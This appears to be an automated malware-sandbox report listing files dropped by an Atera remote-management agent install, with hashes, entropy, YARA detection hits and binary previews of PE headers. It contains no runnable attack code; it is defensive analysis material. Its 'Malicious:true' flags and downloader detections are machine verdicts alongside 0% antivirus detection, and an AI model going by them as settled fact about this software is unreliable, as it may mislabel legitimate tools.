                                                                                                                                                                                                                                                                                                                                  SHA-512:2E8D0DE29E62732458472B8FA5AC35C48416E6AA5034BE309F688A095E6222A215EA3318FA02358707FBB98918983F2AB8996AC6703585485533ED4975AB7E3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,............" ..0..>...........]... ...`....... ..............................T.....`..................................]..O....`...............H...(...........\..T............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................]......H............}...........D..0....\........................................(-...*..(-...*:.(-.....}....*..j ....n_ ....n3..*. ...._ ....`*....0..w...........o.......o.................o.....o/.......o.....o/.....(0.........().....(1..............,..o2.....,..o2.....(3....*.........?Z.......0..K...........o.............o.....o/.....(0....(*....(1.............,..o2.....(3....*.........)8.......0...........(+..........*...0..g.........(...+....o.............o.....o/..............(

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):86816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.013720216920584
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:rqz3g47M9YIB/nRPP6eyO0MIq6y7suFvTbqtN0p7pqHUzH:rq3M5ftPzTLIq6y7sgytNK7p0Uz
                                                                                                                                                                                                                                                                                                                                  MD5:AAB8F9887FA45F30FE04472352E5AFEA
                                                                                                                                                                                                                                                                                                                                  SHA1:8244D05575D13E605B22538D7AE66D4805BC45C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:7DFACED56145F3C6B80DE25A09E0DF6729149EF3C6A8F8F1B559E93B914FD2DE
                                                                                                                                                                                                                                                                                                                                  SHA-512:97BA85978B48324908427833374CB3C19DE01F136D29A3ADCAC350A0555B30087513CD33BB7B18F0CB52CB3E8884E0ACD1BD256704A8B96EA0C4CA8A0F8135CE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............<... ...@....... ....................................`................................./<..O....@.. ............*.. )...`...... ;..T............................................ ............... ..H............text........ ...................... ..`.rsrc... ....@....... ..............@..@.reloc.......`.......(..............@..B................c<......H.......hP..............h)..8....:........................................(&...*^.(&......K...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*6.~'....((...*R.~'....((.....()...*..(*...~'...(+...-..(*....s,...(+...*.*2.{-...(....*.~q...*...0..........(....,..*..(.....o.......&...*..............$....0...........(.......(/...-..,..*.*.(....,.r...p......%...%...(0...*..(1...*.(....,.r...p......%...%...%...(0...*...(2...*.(....,!r...p......%...%...%...%...(0.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                                                                                                                  MD5:90289DA899746E328816734D723C93A0
                                                                                                                                                                                                                                                                                                                                  SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                                                                                                                  SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ..............................................~.Xi.....05.]..sE04.hg.'...../.K'l..a..m..Z....q..m..4&....h....le..|.Z...../.....!*............<.XV$!./..})................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                                                                                                                  MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                                                                                                                  SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                                                                                                                  SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                                                                                                                  SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ........................................u..q.:7i...g.'=......a.2j.V.:}......o.....F5.Sv....v.|...(.':KP.d._..D..s].Nx<..e........k.......P.0...h")g..N.>...@...).6...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1152141
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                                                                                                                  MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                                                                                                                  SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                                                                                                                  SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....}BrX.j5.........-...AgentPackageADRemote/AgentPackageADRemote.exe....0........d......0.....r...,.. UMA...|f-].=.U.j..p.....r..f.<..Z..g}m..LC.T.....Y.{s\.k... Y.....4..}..h.<L......L.........z.i9.K..~.ue."#"r.r..p..0.\./R...C.w..8..-.3.t...(.c..P..N....q.v&........u.a.e...]...9....r.@.=\v..B.~{|c.j.S...JL!g..Y@Ts9D$...)P.......{..8...Y...K...Z._".@.....a.8.P..7...ZY.-D8f\..ej.....@.w.$R>Q.B.....V..@..9....zdB..x..GK.....LDp...Xc......x......*.u..R..,...#...Q,.V....}..W....oT.._6n.g..bK.p.s...pABSv0.7..'.JK ....b.Y.-.B...!'Tjsn...."V......B.@.<CQ.K....>D.5E..w.'. ._%E..-......7.M..u1nr.7....T[.%6..t...Z..Q.;./....k.V....J-.\`..d...K.c. ..D.G.j.../..z..k.KH.....!..M...8....fr.......m....2..4-... ..CF...skN*.kv.E[3."gi3.Uv..*.S...n..~...)..!V..>...D..2..b..}..xW.ZPd..X\.g...1.RY.u.]p..Z b%r.....Hc.N.+[E...Q....3.K.H.....)NQ@L......./2.v..q...*.-:%... "...`...i..+!.D..q.];.ARRrQZ.B. i...M...Qy$.....p...A.U...=...LHF%...]..l.S.pl1....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.139785828189609
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:avB4oeg/Po2Obb95bmrpeALHpZAgEpYinAMxCC8:ruQpbHbklAp7Hxx8
                                                                                                                                                                                                                                                                                                                                  MD5:3180C705182447F4BCC7CE8E2820B25D
                                                                                                                                                                                                                                                                                                                                  SHA1:AD6486557819A33D3F29B18D92B43B11707AAE6E
                                                                                                                                                                                                                                                                                                                                  SHA-256:5B536EDA4BFF1FDB5B1DB4987E66DA88C6C0E1D919777623344CD064D5C9BA22
                                                                                                                                                                                                                                                                                                                                  SHA-512:228149E1915D8375AA93A0AFF8C5A1D3417DF41B46F5A6D9A7052715DBB93E1E0A034A63F0FAAD98D4067BCFE86EDB5EB1DDF750C341607D33931526C784EB35
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0................. ........@.. ...................................`.................................p...O.......................0(.............8............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...s............................................................(....*.0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..(....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*.0..........s....%.o...+o....o...+&%.o...+o....o...+&%.o...+o....o...+&%.o...+o!...o...+&%.o...+o#...o...+&%.o...+o%...o...+&%.o...+o...+&%.o...+o(...o...+&%(*...%.(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1782
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.026919218581437
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrb7h+1/gYo27RgdSagFsg+w3Sg+CjdgDt:7rn4cwCR
                                                                                                                                                                                                                                                                                                                                  MD5:13CFEB2261E4DAEAA3C06F7A60078F91
                                                                                                                                                                                                                                                                                                                                  SHA1:D76B6D07D8FEC75789025FBAB18048AD193B1462
                                                                                                                                                                                                                                                                                                                                  SHA-256:6BBDCC477F0C1EFBD0129AC7716F96CC2844103169AAEBFF03D4C8F5C54745D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F804155363FEB09427F7C8E968EAAA7DDA15F739769864A23C8A0FC9137151A03F02FB30B11F47A69DDCEFFF02BF933721C3757A3FB78C705D0537205BBD3A92
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhTLV:WFLV
                                                                                                                                                                                                                                                                                                                                  MD5:530F2E4E5E3DDA283DB3C78CC0C13297
                                                                                                                                                                                                                                                                                                                                  SHA1:CF60B778D32C9562B94411DA9DCD8FED2017AB84
                                                                                                                                                                                                                                                                                                                                  SHA-256:447163A4A3F1F10AFD9EC48F915085B3236F0FA7EDC9973C16925EDB5F6CF0CC
                                                                                                                                                                                                                                                                                                                                  SHA-512:DD4F7AF9A0F57707D1924BB504D3FC267B4898B909CF6E6ECD274BBC9B487A5CE5D8000E3FAD6EC0061E565C728455965C91F1B4E380227264AD2EE3E2990E28
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=6.0

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95792
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.184818983275012
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:GQ7brNBoXFbuhpLHbTOgemUu7+n3uRw1FlQRd5JY4t5K56y0sDrUfvPrhZwLXF7X:GQ/iwLWgeW+neRw1Hyd/YCs56y0sXUfG
                                                                                                                                                                                                                                                                                                                                  MD5:23C8674C75D5944445BF1C035E4A4789
                                                                                                                                                                                                                                                                                                                                  SHA1:A1255CEDEAC9F9A04B50C7814CD7C61A50623A19
                                                                                                                                                                                                                                                                                                                                  SHA-256:D2043F878740F643BF91F3EF798DBB9747904A1D503AAC4ED2108131F663AB37
                                                                                                                                                                                                                                                                                                                                  SHA-512:52ABA8350A05E9E5A672CB04CE528CFC4DA009247B2BD8B63096AF9A37C1F352A4C2BD12B03973AA1E733551F94F542814E425223DEF2AA33B595AA2DC555A95
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bd.........." ..0..D...........b... ........... ...............................{....`..................................b..O.......8............N..0(..........la............................................... ............... ..H............text....B... ...D.................. ..`.rsrc...8............F..............@..@.reloc...............L..............@..B.................b......H........j..l............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tQ...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.002764283325334
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ocNQW9Tbp/VgiZi7sT5gdBxYJMcTnbJkI+eD7HxSR:ojobJVgiHMcr5Da
                                                                                                                                                                                                                                                                                                                                  MD5:10961147A546FFCD8B7C19771BA70198
                                                                                                                                                                                                                                                                                                                                  SHA1:5B63EEA0B2E53DB81AFB146D469E899E1E67DACF
                                                                                                                                                                                                                                                                                                                                  SHA-256:95C53735107ADCC39E6C3268335B2AD434E2364A007CC97B2147AF3A6EE837F3
                                                                                                                                                                                                                                                                                                                                  SHA-512:9830450FF9E8D2E6B74D8D8938A18DFB1BA008249D389FB923D5AAA25B7F8F9E5BAD4CB3FC13100C5F53B0CCEDA4E9427E90F2B733EA9BE0FFAA5D5F165C815E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............" ..0..B..........Za... ........... ..............................~.....`..................................a..O....................L..0(..........``..8............................................ ............... ..H............text...`A... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................9a......H.......4i..,.............................................................(......}......}.......}.......}........o?...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po#...o....*..{....o2...r...p.(....(....o(...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656654225594367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:5Xh+/DtYchNyby2sE9jBF6IYiYF8pA5K+oCGUHFeFl5XqQ:5Xh+tYmNyb8E9VF6IYinAM+oCaFXF
                                                                                                                                                                                                                                                                                                                                  MD5:96703E15C375B8A701C9D1F5BE8C4149
                                                                                                                                                                                                                                                                                                                                  SHA1:B058FA32FBDA52D70C1B966640B4824D5487ADC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:3F830FA8F22EB09D59088705E26DCE964FB430722E91630B03EB15FCC48359A0
                                                                                                                                                                                                                                                                                                                                  SHA-512:3D7515BBFD018BCB24C69235A65F401BCF00D6932E412696FF31DC6EDE9436B2D4E5983450C9F88AF7B52D18949B4C1EFFEB9C3F94E85DCE57C4495F21D21A86
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............0(...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):52272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.410547751816252
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:KQMnML8f1VNPa7fb8LRaIzlRK/usybUjuUY0vZKE8tcqPqZw+I39Wu1FEpYinAM/:K9ML8LW/usybGYVE8mZw+89Wu1e7Hxas
                                                                                                                                                                                                                                                                                                                                  MD5:20FC2DB17D09554BBC37785B3644DFC3
                                                                                                                                                                                                                                                                                                                                  SHA1:AAC4CA54730DB46145748AB419CF6BE3B39D2A74
                                                                                                                                                                                                                                                                                                                                  SHA-256:4151D6C627A324D9F2991A4D98BB7544926DB41B3211EDC1B2085922B1D1FC46
                                                                                                                                                                                                                                                                                                                                  SHA-512:62F6711FD2861BEA0FC214882678CF7F98CB53E8AF858C46CCC1F5B1F2FF9C22DCBD3A184A9DE9AD2D2148F0B529426DE7F793A63A459D72D2DCB048DF4E40FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&............." ..0.................. ........... ..............................&.....`.................................>...O.......4...............0(..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................r.......H........E...s...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....P.........io ...&..i.X.P..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....P......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
